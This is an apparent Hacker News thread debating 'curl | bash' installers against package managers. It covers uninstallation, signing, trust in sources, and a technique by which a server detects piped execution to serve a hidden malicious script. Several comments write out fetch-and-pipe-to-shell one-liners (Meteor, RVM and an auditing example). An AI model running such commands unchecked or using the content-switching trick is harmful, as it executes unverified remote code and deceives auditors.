For me personally, the security aspect isn't even the reason I dislike curl | bash installers. There's no standard behaviour for curl|sh, and it re-introduces many problems that were solved by package managers decades ago.
* Will it work? I'm on Arch Linux. This installer was probably tested on OSX and Ubuntu and deemed "portable". I've seen curl|sudo sh installers trying to apt-get installing dependencies.
* Where does it place files? I've got a ~/.meteor folder that's 784MB. Why would you install software libraries and binaries to $HOME? I now have to tell my backup tool to ignore it when backing up my home partition, great. The FHS was established for a reason, people.
* Correlary to the previous question: How do I uninstall it? Maybe all files were installed to a hidden folder in ~/, maybe there's some stuff in /opt, or /usr/local, or who knows where else. If the installer doesn't implement uninstall functionality itself, I now have to go hunt for the stuff it placed in my filesystem.
I understand the need to be able to distribute your software without having to implement native packaging for OSX/Debian/Ubuntu/Red Hat/Fedora/Arch/...
Docker solved this problem. If you're feeling lazy when it comes to distributing your app, just ship a Docker container and be done with it.
> Correlary to the previous question: How do I uninstall it? Maybe all files were installed to a hidden folder in ~/, maybe there's some stuff in /opt, or /usr/local, or who knows where else.
How does one uninstall stuff on Linux anyway? My Linux boxes are always like thrash cans - I add and add new stuff until it's time to upgrade either the system or the machine, so it gets wiped and replaced. Never figured out how to delete stuff in a way that will not leave a ton of things behind...
Package managers deal well with files which they installed. What the app creates is your business... and for a good reason. You don't want random package upgrade / conflict to remove your data just because there's something changing about the binary.
The following generally works for me. It removes the installed files, including configuration files. Additionally it will remove any dependencies that were only used by packagename
It's a best effort though, you're relying on the package maintainer to have tracked all the installed files and clean up anything they might have modified, which hopefully you or something else hasn't modified after the package was installed.
The packages authored by distributions tend to be pretty good, but I've seen RPMs with nothing more than tar zxf in them and no tracking of the files installed.
The major package managers expect the package to manage the artifacts installed, this works if everyone plays nice and does their job...
You're right that this requires well-maintained packages, and this is one of the strengths of Debian: its policies that require well-maintained packages. If you install a package that's part of Debian, you can count on it being well-maintained, as opposed to one put out by a random web site or developer, which may install but may not integrate well or clean up after itself.
Package formats each have their own expectations. RPM likes being pointed to a source tarball, given the steps to build the project, and being given a list of the just-built files to include in the package. Those are the artifacts that RPM will manage (and they can be marked things like "doc", "config", or given specific attributes). Deb is broadly similar, but I feel like the framework is a little less controlled than the RPM one.
The manager basically just defines a framework. Packages can abuse that framework in various ways (I haven't even mentioned install triggers, to execute code when other named packages are added or removed). There are a lot of ways to get it wrong, but when the dev builds a good package, it's almost magic how nicely it works.
I often do this to find out what files were installed where.
$ touch now
$ install.sh
$ find / -newer now
That is supposing you trust install.sh of course.
You can redirect the output of find to a file for later removal. You will have to filter out false positives from the 'find' output, usually dev nodes.
I just don't understand this. I've used Debian and Ubuntu for many years, and I've never had to reinstall a single installation for any reason. I use packages whenever possible, and when installing unpackaged software, I use checkinstall to make a package from it. When I move to a new system or disk, I rsync the filesystem over and boot from the new disk. There is no accumulated cruft; or if there is, it's limited to e.g. tiny config files in /etc from older package versions, which aren't a problem or even noticeable.
The closest to cruft is hidden directories in my homedir from software I don't use anymore. That isn't a problem either: they don't take up much space, and it's easy to manually delete them if I ever feel like it. If not, they are compressed and deduplicated by backup software, and they're hidden by default, so who cares?
I wish I had your luck... A lot of fixes on forums constantly suggest to uninstall first. Which sometimes actually fixes issues. Other times it makes things worse. Either way - buying a lottery ticket soon?
> A lot of fixes on forums constantly suggest to uninstall first.
A lot of people seeking and offering help on forums are former Windows users, who are used to doing that to fix problems. They just don't what else to do, so that's what they do.
And, sure, if you break a configuration file or package dependency, wiping the disk and reinstalling will fix that--but so would fixing the file or dependency. In my experience, the nuclear option is never necessary with Linux. Worst case, you boot off a CD or USB drive, mount the partition, chroot if necessary, fix it, and reboot.
> Other times it makes things worse.
That is very strange, indeed. D:
> buying a lottery ticket soon?
Haha, nope, been having this "luck" for years now, but it only seems to affect my Linux installs. :(
To be honest, I've solved many more problems with Linux by reinstalling (usually a different distribution) than with Windows.
And just yesterday my Linux did what I've never seen an OS do before - it losts it UI clock display. The solution was simple and typical for Linux - it involved killing a random process. But at that moment I realized that we used to laugh that rebooting stuff is the Windows way of doing things. Not anymore, apparently.
> And just yesterday my Linux did what I've never seen an OS do before - it losts it UI clock display. The solution was simple and typical for Linux - it involved killing a random process.
What desktop environment was that? There are many different ones available for Linux systems, and they don't all behave that way. e.g. I've never had that kind of problem with KDE3/TDE or KDE4.
My favorite is still hunting down .lck files with strace because of a bad lock file implementation. Reinstalling definitely fixes that one :). Looking at you, firefox and yum!
>For me personally, the security aspect isn't even the reason I dislike curl | bash installers. There's no standard behaviour for curl|sh, and it re-introduces many problems that were solved by package managers decades ago.
Every time I've seen it used, curl | bash is simply a way to deal with the fact that the users all have different package managers (often with outdated software) and quite complicated workflows to get stuff set up with them because there were problems that the package manager didn't solve.
>Docker solved this problem.
Ironic. Docker is one of those applications. And they used to ask for it to be installed with a curl pipe.
They seem to have replaced it with what is effectively a script executed with human hands. Not really an improvement.
I was genuinly confused with regards to your last point.
There's a section on their website[0] there are installation instructions for various distributions using repositories and package managers. In other words, the right(tm) way of doing software distribution on Linux.
But then on a different part of their website I found the curl | sh instructions you allude to[1]. Bizarre that they still support that installation method.
To make matters worse, the big orange "Get Started" call to action button actually leads to the curl|sh installation instructions. In light of that I certainly can't blame you for not knowing about the proper distribution packages.
That curled script actually installs the 'proper' distribution packages. It has a lot of clever stuff to figure out which environment it's running on and then does whatever commands are necessary - including, e.g., adding keys so that the external repos where docker is hosted are trusted.
Point being that even if you install "the right way" on linux using package managers it's still a multi-step complicated process that benefits from being automated in a bash script.
It's really a shame that you have to wrap the best practices aproach in a bad practice in order to make it convenient.
> Point being that even if you install "the right way" on linux using package managers it's still a multi-step complicated process that benefits from being automated in a bash script.
Right, because distributions want different things than software authors.
If you're a Debian/Ubuntu/RHEL maintainer, you want stable, tested versions of software that you can vouch for and support for several years.
If you're the maintainer of an application, in this case Docker, you want your users to run the latest and greatest version of your software. You can't just demand that each distro just ships the latest and greatest version of your software. So if you're Docker you end up having to do the following for each distro:
* package the software for that distro
* sign that package
* serve your your own repository containing that package
* ask your users to add the repository
* ask your users to trust the signature
And then finally your users can install the package.
That's one of the reasons I like running Arch Linux on my workstation. The desires of the software authors, distro maintainers and users align.
Docker Inc: "Hey wouldn't it be cool if your users could install the latest
stable version of Docker?"
Arch Linux maintainers: "Yeah, it would. We'll keep the latest version in the
repo and our users can just `sudo pacman -S docker`"
Docker Inc: "Cool."
Arch Linux users: "Cool."
You should try openSUSE Tumbleweed. It actually is faster at releasing new packages than Arch in some cases, and has much more testing and stability from my experience. But it should be noted there are good reasons to want stable software especially with Docker (which is something I actually maintain for SUSE systems) -- there's been a lot of very invasive architectural changes in the last 3 or 4 releases. And all of them cause issues and aren't backwards compatible or correctly handled in terms of how to migrate with minimal downtime.
FWIW, this is Meteor's justification in /usr/local/bin/meteor:
# This is the script that we install somewhere in your $PATH (as "meteor")
# when you run
# $ curl https://install.meteor.com/ | sh
# It's the only file that we install globally on your system; each user of
# Meteor gets their own personal package and tools repository, called the
# warehouse (or, for 0.9.0 and newer, the "tropohouse"), in ~/.meteor/. This
# means that a user can share packages among multiple apps and automatically
# update to new releases without having to have permissions to write them to
# anywhere global.
I used to do Linux packaging full-time and constantly hit limitations in what Linux packaging formats support or allow. There's still a lot of progress that could be made in that area, but unfortunately any attempt to improve will likely become that 15th competing standard XKCD refers to...
For dealing with this problem, as well as anything that's not already packaged, the checkinstall utility is very helpful. It intercepts filesystem calls and builds deb/rpm/tgz packages that you install with your distro's package manager. It's been packaged in Debian for a long time. Highly recommended.
I don't think that's nearly as clever a counter-argument against curl|bash as they appear to.
A few points of the shortcomings of curl|bash vs RPM and others:
* curl|bash is not transactional. If you have an install/upgrade process in a different tab, and you close your terminal accidentally, how do you know if the install/upgrade completed?
* There's no obvious uninstall method, and you need to read the docs to see what, if anything, you should remove outside the main directory.
* There's no way of verifying if files have been tampered with post installation. This has negative security and operational consequences.
* It's much more vulnerable to MiTM attacks - a proxy with a successfully faked certificate can trivially modify a bash script on the wire and add a malicious command to it. This is hard for a user to detect. Packages are (on most distros) installed via package managers that verify GPG signing keys, making in-flight modification very very greatly more difficult.
* Packages are much more auditable - I can download a package and inspect it, and know that it will run the same actions on every machine it's deployed to. curl|bash can trivially serve different instructions to different requests, based on whatever secret criteria the server operator decides.
If you're going to try and argue that instead of doing what the generally accepted $good_thing is, and instead use $quick_and_easy solution that's widely perceived to be insecure, when you argue in defence of your position, you need to make very sure that you're not just trying to justify laziness. I don't think sandstorm have really thought about this hard enough.
I think the many discussions about this conflates two things:
1. "curl|bash" vs "curl >install.sh; sh install.sh"
2. install scripts vs package managers
The OP talks about how to detect a streaming execution of a script and exploit it. This proof of concept exploit aims at discouraging the the use of curl|bash as a means to installing code, and instead promotes that at least you should save the script (and review it) (i.e. the "curl >install.sh; sh install.sh").
All of the points you mentioned are valid and important pain points that affect any arbitrary executable install script (not verified cryptographically using a side channel). Deciding whether to use an install script or a packaging system is really a tradeoff.
The "obvious" problem the OP was talking about was that smell you feel when you see piping code to bash. I think OP made an excellent job showing how you can make it harder for people to spot and audit malicious code and how this is pretty serious downside for piping code into bash; It's more like: "I have a gut feeling this is horrible, so let's think about a way to prove that gut feeling", and the proof is insightful and non obvious.
(almost) all of your points are fair, but slightly tangential to their article: they want to put the "curl | bash is _insecure_" myth to rest. They explicitly acknowledge that it is worse than package managers in many ways.
Perhaps they should have said: "however, the following non-security arguments are valid, and there are more we didn't list." Agreed.
But, at the end of the day, they're right: it's not _less secure_ than, e.g., npm.
PS: In your list; "It's much more vulnerable to MiTM attacks" --- that's essentially the PGP vs HTTPS argument in disguise. Which they also cover, and acknowledge to be true; the argument is essentially "curl https:.. | bash is not less secure than any HTTPS based method, including npm, .isos, etc."
EDIT: and because this is such a hot topic, I just want to emphasize: I'm not arguing in favor of curl | bash. This is only a counter-argument to "curl | bash is less secure than other https- based install methods".
Many of my points have a security element to them. Such as inability to verify if files have been tampered with, inability to audit beforehand what the script will do and ease of MiTM attacks.
My point with the PGP argument is that you can indeed go through all those steps to verify their install script with GPG (although note that on top of the steps they run, you should ideally also verify the script against a known hash that you verified elsewhere to make sure that the contents of the script is what you expect, as well as the authors).
But the manual GPG verification process will be ignored by almost all users, who will decide they can't be bothered. My point about package managers is that they do this automatically, without requiring the user to jump through extra hoops. Which is much better than the 8 additional steps that almost no-one will bother with, in practice.
Also saying that it's not less secure than npm isn't a great benchmark - npm is really bad too. See the recent left-pad issues, for example. So yeah - it's not really much worse than other things which are also bad. But it's a lot worse than doing it properly, with a signed RPM repository.
> verify their install script with GPG (although note that on top of the steps they run, you should ideally also verify the script against a known hash that you verified elsewhere to make sure that the contents of the script is what you expect, as well as the authors).
If you've verified the script with GPG, the extra step of a hash is wholly unnecessary. Any change to the script's contents would immediately invalidate the GPG signature.
if you want to audit the script before you run it, you can just save it into a file first and then run it.
The point of this oneliners is to allow anybody to install it. It's insecure as hell, but whether you're piping it directly to bash or downloading an installer file and then executing it (like a great deal if not most of the software is still distributed to the general public anyway) makes not a big difference.
That's why the linked article is interesting; it shows that in fact there is a difference between piping to bash or downloading an installer. The difference is important and concerns the auditability. Any people who cares to audit the script might not notice anything suspicious but people who blindly pipe it to bash can potentially run code that is not the same that audtors see.
What's basically happening is the either a malicious software publisher, or a MiTM, fools auditors. And fooling auditors is bad because a lot of people rely on the community to signal this kind of abuse.
What an auditor could do to detect this kind of malware distribution is:
curl https://foo/bar.sh | tee >(md5sum)| sh
If she gets a different hash than by fingerprinting a saved download, it's an indication that the server is tampering with the installer.
However, people who follow good practices and want to audit the script are not affected by the problem in the first place, because they will just save the script and they will know how to execute it after having read it.
People who don't know how to audit the installer in the first place might not even know how to verify the download with GPG as well. Or worse, they won't bother and might deem the software to be too hard to install and choose to use something worse.
That's why sandstorm offers PGP-verified installs for those who know what they're doing and show how to use keybase to solve the web of trust issue.
(I'm not affiliated with sandstorm, but they seem a very reasonable and competent bunch to me)
> I don't think sandstorm have really thought about this hard enough.
I suspect we've spent far more time thinking about this than most people. We've heard every argument many times. The referenced blog post specifically addresses the security argument (hence the title) because that's the one we feel is most misleading.
I absolutely agree that curl|bash is ugly compared to package managers, but there are some serious shortcomings of package managers too, and it's a trade-off. With deb or rpm, we are tied to the release schedules of the distros, which is unreasonably slow -- Sandstorm does a release every week whereas most distros don't release any more often than twice a year.
We can perhaps convince people to add our own servers as an apt source or whatever, but now the MITM attack possibility is back. Yes, packages are signed, but you'd have to get the signing key from us, probably over HTTPS. No one wants to do the web of trust thing in our experience (I know because we actually offer this option, as described in the blog post, and sadly, almost no one takes it).
The Sandstorm installer actually goes to great lengths to be portable and avoid creating a mess. It self-containerizes under /opt/sandstorm and doesn't touch anything else on your system. This actually means that Sandstorm is likely to work on every distro (given a new enough kernel, which the installer checks for). If we instead tried to fit into package managers, we'd need to maintain half a dozen different package formats and actually test that they install and work on a dozen distros -- it would get pretty hard to do that for every weekly release. (Incidentally, Sandstorm auto-updates, and it does check signatures when downloading updates.)
So, yeah, it's pretty complicated, and we're constantly re-evaluating whether our current solution is really the best answer, but for now it seems like what we have is the best trade-off.
What happens if your webhost is hacked and someone installs a malicious install.sh? Without a published signature to verify against, there's no way to detect it.
We do provide a signature. But of course if you're going to check the signature, you need to get our public key from somewhere. You can't just get it from our server, because then you have the same problem: if someone hacked our server then they could replace the key file with their own. We publish instructions to actually verify the key here: https://docs.sandstorm.io/en/latest/install/#option-3-pgp-ve... But as you can see, it's complicated, and most people aren't going to do it. If you're not going to go through the whole process, then checking a signature at all is pointless.
Note that distributing Sandstorm as .debs or .rpms wouldn't solve this, because we'd still be distributing them from our own server, and you'd still need to get our key from somewhere to check the signature.
If you use checkinstall(1) it'll see what `sudo make install` would do, and create a local package that would do that (e.g. a deb on ubuntu). This package can then be installed in the usual manner, which gives you uninstallability, transactionality, and ensures you don't overwrite any other files installed via a package. This is much better than curl|bash.
Correct me if I'm wrong but can't you also run arbitrary code while installing packages?
Either way I'm not saying `curl | bash` is good, I'm just trying to point out that people have a very knee jerk reaction to it and pay no mind to things which are similarly as dangerous.
I disagree. Many (probably most) makefiles conform to the GNU Coding Standards, which recommend declaring "all" to be the default make target. `make all` does not install; that's what `make install` is for.
The idea of the original parent comment on Make is not about well conforming makefiles.
The idea is that if one doesn't trust a random curl-ed install file, they shouldn't trust a downloaded makefile either -- and for the same reasons, yet tons of people complaint about the first, but have been using the latter for decades without complain...
Recently I stumbled across hashpipe: "hashpipe helps you venture into the unknown. It reads from stdin, checks the hash of the content, and outputs it IF AND ONLY IF it matches the provided hash checksum." [https://github.com/jbenet/hashpipe]
Binaries and some websites are signed with a verified legal entity.
This is what the Debian guys standing in a circle holding their passwords are doing at your Linux event. It's also why when you visit github it says 'GitHub, Inc [US]' in your browser's address bar. Heads up: I work on the latter.
Sure but SSL identification is a very small part of the process of having a "trusted source".
There is, I'm sure, malicious software hosted on github, so I can download things from that trusted source and still have trouble.
there is insecure software hosted on github, again there's no protection based on hosting company.
If a developer who hosts a repository on github has their credentials compromised, their software may become malicious.
Also as an end-user (particularly a non-paying one) I have no visibility of Githubs own security policies and practices, so assessing the level of trust placed there is tricky.
The debian model has more checks and balances (i.e. it's harder to get from one set of compromised creds to a malicious package in a production repo.) but still not perfect...
Ahh but that's one of the hardest pieces of the trust puzzle.
On the internet, how do you know who's who. you download a package from npm. Who wrote it, what's their background, where do they work? What are their security practices like, what are the security practices of the hosting company?
so we say Redhat/Apache are more trusted sure, that's one of the reasons that I dislike curl|bash from random sites, there's no way of assessing trust in that software or its origin...
>On the internet, how do you know who's who. you download a package from npm. Who wrote it, what's their background, where do they work? What are their security practices like, what are the security practices of the hosting company?
Check the npm package's ratings, and the github repository watchers and stars.
Try to find and read a few posts (and their comments) on the package. The more respected the source (e.g. HN comments vs comments on Digg), the better.
that's not a bad mechanism (if a bit time consuming) for personal usage, but wouldn't likely work for corp. use..
Even there though all it does is move the problem one step away. Most npm packages have dependencies (and quite a few of them), you have no way of knowing whether the author of the main package did the checks you describe for their dependencies...
>Even there though all it does is move the problem one step away. Most npm packages have dependencies (and quite a few of them), you have no way of knowing whether the author of the main package did the checks you describe for their dependencies...
That's the nice thing: you don't need to. You just need to trust that the main package works well enough -- and you get that from the fact that it is in widespread use (many downloads, watchers, stars, posts, etc).
in security where breaches can cost a lot of money, relying on heavy use as an indication of trustworthiness may not be a great idea.
For example OpenSSL was and is used by lots of people, this has not stopped it having a lot of security problems...
And true once the vulnerabilities get published you get to know about the problems more quickly but then in a world of targeted attacks and professional exploitation that might not be great comfort..
It doesn't fail, it's still as usable as ever -- just not infallible, which nothing is anyway.
The dynamics of something with a larger user base being more trustworthy don't change because we're on the internet. It's a simple network (no pun intended) effect.
If the program "can download custom instructions after installation" then a large user base still means that users will be bound to find it sooner or later (and make it public/fix it) and it makes it less likely to be you (because you're 1 from 200,000 downloading it, not 1 of 20 or 200).
Every time I see that I just wget the script and inspect it. If it does anything too clever, I don't install it that way. If I can't reason about the shell script something is wrong.
It's like being emailed a .bat file in 1999. Would you blindly run it on your Windows box?! I hope not!
The unfortunate problem with this is that while piping directly into bash can be exploited, it remains as one of the easiest ways to install programs.
Taking RVM for example. Their instructions are to run this: `curl -sSL https://get.rvm.io | bash -s stable`. The script that is executed is 887 lines long. The installation is "complex", requiring a lot of different stages. Now, the solution to this is "Use a package manager". Sure, that works in a lot of cases. However, when you have something like RVM which is used across several major operating systems, and hundreds of different flavours, each with their own quirks and package managers it suddenly gets difficult to manage each of these.
The problem we face is, how can we make it easy to install something, while still being safe and maintainable?
Breaking this down further, there are 2 issues to solve. The first is "How do we ensure what we download is what the maintainer says that we should download?". I.e. How do we make sure there are no malicious injections. That one is simple. Use SSL.
The second issue is, "I want to install this thing but I don't know if I can trust the installer". Are you crazy!? This isn't an issue. If you don't trust the installer, you sure as hell can't trust the product. If you don't trust either of them, then you automatically don't trust the other and shouldn't be installing it.
The result is that, yes, people can maliciously serve up code when you pipe the output of curl through bash without you realising. However, this is no different than blindly trusting and installing a script.
> If you don't trust the installer, you sure as hell can't trust the product
I can't think of ten pieces of software with excellent installers.
Software distributors generally pay very little attention to the installer. That is because installers are written by people who want to try and make it easy to install something, and don't really care about anything else. If they can get you to install something, helping you remove it isn't their problem.
If they can get you to install something, protecting you from really unlikely things like someone hacking their CDN and delivering malware is a high quality problem: Either they have enough users so that they will be forgiven, or they won't have enough users and the project is abandoned anyway.
I don't trust installers.
I don't trust installers to document what they're doing, or tell me where files go, because they don't.
I don't trust installers to deliver a secure transparent experience, because they don't.
I don't trust installers to consider conflicts, like what else do I have installed because they don't.
I don't trust installers to create security boundaries, protecting me and my files from bugs in the software, because they don't.
For things that are open source, I try to use the software in-tree without installing it. For other things, I evaluate using a virtual machine. Seriously, I don't trust installers because all of you are bad at them.
> The problem we face is, how can we make it easy to install something, while still being safe and maintainable?
Google, Apple, Microsoft, et al have recommended publishing platforms (aka "app stores") that are designed to specifically solve this problem.
For Debian and the derived, we can approach a Debian Maintainer and ask them for help getting it into Debian. For other distributions, we can take similar steps.
If we insist on publishing things ourselves, we can make our software really portable: Let it live in any directory, and not touch any files. Make it easy for the user to verify this.
If we can't do that, we can document the details: Explain all the files we touch and why, and recommend users create separate user accounts (or containers/virtual machines) to really protect themselves. Try to get people used to this level of care because having a positive experience with good software with excellent documentation[1] will give you pause when faced with anything else.
Honestly, the number of programs that want to run as root or as my user account is terrifying, and the amount of work necessary to sandbox unknown apps really makes me not want to bother. I know most people don't worry about this, so purely from a "hurr hurr move fast" point of view, this isn't anything anyone needs to worry about: `curl | bash` is good enough, and will likely be good enough for a long time.
I don't think the installer problem will ever get better, though the portable software idea would make things better as the application wouldn't be scattered all over the place.
Its why I stick everything in a container now, as then I don't care what software does to its filesystem, and I only push what directories I want it to have into it. This also lets me run multiple versions of software when the software does not normally support that.
> However, when you have something like RVM which is used across several major operating systems, and hundreds of different flavours, each with their own quirks and package managers it suddenly gets difficult to manage each of these.
I'm not sure that really changes with an install script. You've got several major operating systems, hundreds of flavours with all kinds of quirks. And you don't even know what shell you're really running on. How do you know your install script will work in any reasonable way?
For example, all reasonable package managers will make sure existing files aren't overwritten, existing configs are not modified, all ownership/modes are reasonable by default. Sure, you can override that in post-install script, but it will stand out that you're doing something non-standard, because there's a post-install script.
> how can we make it easy to install something, while still being safe and maintainable?
> Are you crazy!? This isn't an issue. If you don't trust the installer, you sure as hell can't trust the product.
I do not trust either the installer or the app. If I have a simple package to deploy, I can: 1) check that there are no post/pre-install scripts 2) install the files on the system 3) contain/sandbox them using selinux / grsec / apparmor / chroot / separate user. I cannot easily do the same thing with an installer script, which by definition wants to merge foreign files into my running system.
Even better, it's in the interest of app creator to care about this and provide sandboxing by default, even if they trust the app.
"a knowledgable user will most likely check the content first.". Really? I'm knowledgeable in that I understand that the script may contain evil, but I'm lazy as hell so I don't bother to check 99% of the time. Like I clone, build and run repos without checking every SLoC.
Sorry, but I fail to see the difference with downloading and installing without verifying the code. And since verifying the code is usually hard, I don't see the significance of this article.
The difference is in the article itself. Regardless or not of the fact that most people don't verify the scripts that they run (we should! But we don't), the curl | bash paradigm, as explained in the article, actually makes it possible for the attacker to provide two different types of scripts depending on the situation.
Are we dealing with a smarter-than-average user that is downloading the script and then running it (who knows, he might actually read it too!)? Let's serve a legit one. Are we dealing with somebody who's just mindlessly piping curl output into sh? We found our victim!
This allows a malicious server to send you different content when you pipe to bash than it sends your browser (or even to a script), hiding the attack from people that give the script at least a cursory look.
It's fundamentally not much worse than curl > file.sh && sh ./file.sh, but even if the victim notices something odd, all the oddity is invisible.
> Installing software by piping from curl to bash is obviously a bad idea and a knowledgable user will most likely check the content first
While this is true, how is this any different from installing using apt-get/dpkg/rpm ? I have never looked into any package I install. In fact, those things are worse because they require root unlike curl | bash.
At the end of the day it's about trust. If you trust the author(s), you would install it. I trust my distribution/browser/OS and I install things they want me to install it. So, if a project suggests "curl | bash", I would do it when I trust the project.
It's not just about trusting that project. It's about trusting that project to understand relevant interactions with the rest of your system, which may include components or configurations that project's authors have never heard of.
Developers can screw up even with the best of intentions.
I trust distributions more because interactions between components is pretty much all they deal with. That's their specialty.
I'm a distribution developer. I know first hand how often upstream projects screw up due to naivety, because it's my day job to fix their bugs.
Don't get me wrong, I definitely don't think that curl|bash can replace package managers. curl|bash can be used for getting software which doesn't need the sophisticatedness (and effort) of creating packages.
I think you'll still hit the buffer of tee in that case, which may still cause the problem. I'd recommend just saving the file and executing it afterwards.
I wrote up a little utility I wanted to distribute last year, and I came up with this little script block to do it while also verifying the scripts hash:
This downloads the file to /tmp/gut.sh (which hopefully works on your system), then checks whatever file was downloaded against the hash specified (which hopefully works on your system), then executes it, then deletes it.
I think that `shasum` is a pretty widely-available utility among Linuxes and OSX, though not universal, but it occurred to me that it would be really awesome to have a program that was more purpose-built to only execute shell scripts that matched a particular hash, a la:
Obviously, many other systems are more "secure" than curl-bashing, but curl-bashing is very convenient, and adding some sort of common utility to support it could mitigate the most obvious security issues.
Your approach tackles the scenario that the actual shell script `https://www.tillberg.us/c/blah/gut-1.0.3.sh` might be untrustworthy, but the whole command including the verification hash will most likely also be downloaded from `tillberg.us`.
If `tillberg.us` is malicious you assume that both the gut-1.0.3.sh file and also the hash in the curl command will be changed.
So I think your idea only works when you reference files hosted with a third party but decide to trust the guy who gives you the hash. Basically all occurences of curl to bash piping I have seen in the wild are of the former type, so I really don't think this helps much.
It sounds good, but if you're distributing the hash through the same channel as the script, then it's open to the same vulnerability (MITM, website breach, whatever)
> adding some sort of common utility to support it could mitigate the most obvious security issues.
What's funny is that they suggest adding a sleep in the script so that it can be detected as a delay in byte stream delivery, but if you really want to know if the script is being executed and by what, you could literally just have the first line of the script make an http request with whatever meta data you want.
You can't personally attack people like this on HN. Prefixing rudeness with a fig leaf like "I don't want to be rude" doesn't help. You've done this kind of thing in other comments, too. Please take the HN guideline about not calling names in arguments to heart: https://news.ycombinator.com/newsguidelines.html.
He incorrectly accounted for another users greater success by calling the user lucky. In fact what the other user has is greater competency he could improve himself by learning from it instead of dismissing it as luck.
He called me a jackass I merely stated that he should improve his understanding.
It's hard to tell someone kindly that they are incorrect.
I work as a linux admin professionally and work with four different distros on a daily basis. Simply, I don't have enough time to fix every fucking issue that happens on my operating system that prevents something from being installed. And this happens constantly. Is it incompetence when the shitty apt/yum/aur repos are broken by default where an uninstall of $ASININEPACKAGE that needs to be reinstalled later for $DUMBSHITPACKAGE? If someone has a solution that works for many, I will try that, then bitch when it doesn't work, then use the competency you think I don't have to fix it.
It's easy to understand why someone would lash out in response to having their competence snidely negated, but it still damages the community if you do that, so please don't.
Sorry about that. I'll edit my comment. If I still have your attention, actually, would you mind deleting my account and possibly the comments? I've seen lots of comments on here saying that it's difficult to get a response for deletion, so raising it here might work better. I've been spending too much time on here. :)
> I've seen lots of comments on here saying that it's difficult to get a response for deletion
I'm surprised. Those comments must be wrong. We respond to this at hn@ycombinator.com all the time.
HN doesn't delete accounts. We do delete specific posts that people are worried about getting in trouble from. The reason is because deleting an account and all its comments guts the threads that account participated in, which is unfair to the other commenters in the discussion. The threads are community property and we have a responsibility to preserve them. PG wrote about this here: https://news.ycombinator.com/item?id=6813226.
Our approach tries to balance that concern with individual needs. Sometimes people post things they later regret, e.g. personal or employer info. In such cases we're happy to help by redacting or deleting the comment. But we do it on a case-by-case basis. That way people can get their specific concerns taken care of, but the community history remains largely intact.
We do intend to implement account renaming, which should resolve most remaining concerns. But it isn't done yet.
I genuinely appreciate the response and fully agree with the reasoning. I guess the posts I saw were some weird form of survivorship bias. Curious what happened there, but "shit happens" sounds pretty valid. :)
Like I said earlier, I wanted to delete my account just to remove this as a time sink, but it's a bit more than that. The minor reprimand for name calling was a minor confirmation of it, but one of the things I've seen of late is that many posts are incredibly critical of things that often don't deserve it. For example, a few of my posts about personal experiences with mental health are met with strong, undeserved, and almost angry criticisms towards my experiences. It feels overkill, and many times it validates the hostility that those with mental health issues have when discussing these issues. HN seems to be one of harshest sites I've seen on this subject. I mention the reprimanding, since that's a "hard insult", rather than the "soft insults" I've seen during mental health discussions. They both carry a similar weight, but one (for understandable reasons) sounds sharper, so is easier to handle and parse from someone who's dropping into the discussion. Maybe what I've seen is just a few bad eggs, but others have shared similar experiences - thought that may just be the converse of the bad eggs.
Is there anything that can be done to help out here? I'm not calling for any individual solution and by no means asking for censorship of any form, but it's something that's been on my mind recently, since unnecessary hyper-critcal responses feel just as damaging to a community as direct insults are. It's a stupidly difficult problem, but possibly worth mentioning. I'm sure you guys have discussed this before, though.
(Sorry for the mild rant, and this probably isn't the best place to discuss this, so please feel free to delete this and I can shoot an email instead.)
But you detach things that are "bad", moving them to the top-level so they get more visibility and still disemboweling any discussions they were part of.
I've seen some stupid moderation policies in my day, and this is definitely up there.
Yeah, and again, that's just an example of a problem that has a large gradient of issues. An even better example might be apt and logstash, since both are considered "not shit" by many. I realize it's a large and unbearably difficult problem, but when so many devs just say, "Fuck it, it's going live" and don't maintain their repos or push the repo managers to maintain them, it's a problem. Shrugging these problems off like you're doing does nothing to solve the problem.
I'm the user and I'm feeling these effects hard and I'm speaking loudly so that some devs may hopefully listen and respect their product, not just their code.
If it were entirely easy it would have already been automated and you wouldn't have a job.
-Why would you deal with 4 different distros wouldn't it be a lot easier to learn the quirks of one or two?
-Expecting every single package on something like the aur which allows anyone to contribute to all be of optimum quality seems a bit optimistic. Why would you use arch and the aur if you want low maintenance?
-If you have constant issues you are either in the wrong profession, picked the wrong employer, or the wrong software.
-Way to be dismissive. I work with two professionally and two at home. Not that simple.
-aur is just an example, but there are many, many "live" packages on there that aren't close to production ready like they think they are. A better example might be something like skype, whose repos last time I checked fail during install without a LOT of work. There's an enormous lack of QAing in packaging out there.
-That's incredibly dismissive of you again. Mind you, linux admin work is only my job. I do data science, low latency freelance work, security and networking as a hobby, so the extent of the software I use is comparatively large compared to most.
It's funny how so many obvious things are all but obvious when you think a little bit more about it. Interesting read on the subject: https://sandstorm.io/news/2015-09-24-is-curl-bash-insecure-p...
(I don't want to enter the `curl | bash` good or bad rabbit hole; just that the topic cannot be just dismissed as "obvious")